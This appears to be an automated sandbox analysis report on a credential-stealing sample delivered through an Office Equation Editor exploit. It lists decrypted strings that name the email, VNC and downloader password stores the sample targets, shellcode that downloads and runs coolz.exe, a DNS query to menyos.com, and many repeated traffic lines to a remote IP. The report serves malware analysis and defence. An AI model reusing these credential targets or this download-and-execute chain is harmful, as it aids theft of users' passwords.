Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Mail App
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: syncpassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: mailoutgoing
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FoxMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Executable
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FoxmailPath
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPHost
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IncomingServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Opera Mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: opera:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PocoMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Pocomail\accounts.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client\accounts.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "Username":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "Secret":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "ProviderName":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: o6806642kbM7c5
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SenderIdentities
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server_Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: EncryptedPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\ORL\WinVNC3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PasswordViewOnly
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TigerVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TigerVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Paltalk

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.21.35.109 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036706E2 URLDownloadToFileW,	2_2_036706E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03670659 LoadLibraryW,URLDownloadToFileW,	2_2_03670659
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0367072D WinExec,ExitProcess,	2_2_0367072D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705E9 URLDownloadToFileW,	2_2_036705E9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03670673 URLDownloadToFileW,	2_2_03670673
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0367074D ExitProcess,	2_2_0367074D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705CD URLDownloadToFileW,	2_2_036705CD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705B4 ExitProcess,	2_2_036705B4

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: menyos.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
